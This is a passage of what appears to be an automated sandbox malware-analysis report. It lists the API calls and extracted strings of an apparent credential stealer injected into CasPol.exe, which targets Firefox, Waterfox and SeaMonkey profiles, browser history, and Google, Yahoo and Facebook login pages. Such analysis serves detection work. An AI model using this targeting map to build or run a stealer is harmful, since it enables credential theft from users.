                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                  • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                  • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                  • String ID: bhv
                                                                                                                                                                                  • API String ID: 4234240956-2689659898

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2941347001-70141382

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 573 446747-44674b 570->573 574 446728-44672d 570->574 578 4467ac-4467b7 __setusermatherr 571->578 579 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 571->579 573->569 577 44674d-44674f 573->577 574->569 576 446734-44673b 574->576 576->569 580 44673d-446745 576->580 581 446755-446758 577->581 578->579 584 446810-446819 579->584 585 44681e-446825 579->585 580->581 581->571 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 591 446834-446838 587->591 592 44683a-44683e 587->592 589 446845-44684b 588->589 590 446872-446877 588->590 596 446853-446864 GetStartupInfoW 589->596 597 44684d-446851 589->597 590->588 591->587 591->592 592->589 594 446840-446842 592->594 594->589 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2827331108-0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                                  • API String ID: 2470578098-1702587658

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 639 40e1e8-40e1fa call 406e8f 636->639 643 40e270-40e27d call 406b53 639->643 644 40e1fc-40e219 call 40dd50 * 2 639->644 643->639 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 652 40e291-40e294 call 40aa04 649->652 653 40e288-40e290 free 649->653 652->637 653->652 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                  • API String ID: 2804212203-2982631422

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 115830560-3916222277

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                  • API String ID: 77810686-1717621600

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                  • String ID: strings
                                                                                                                                                                                  • API String ID: 3166385802-3030018805

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                  • API String ID: 2791114272-628097481

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                  • String ID: $0.@
                                                                                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
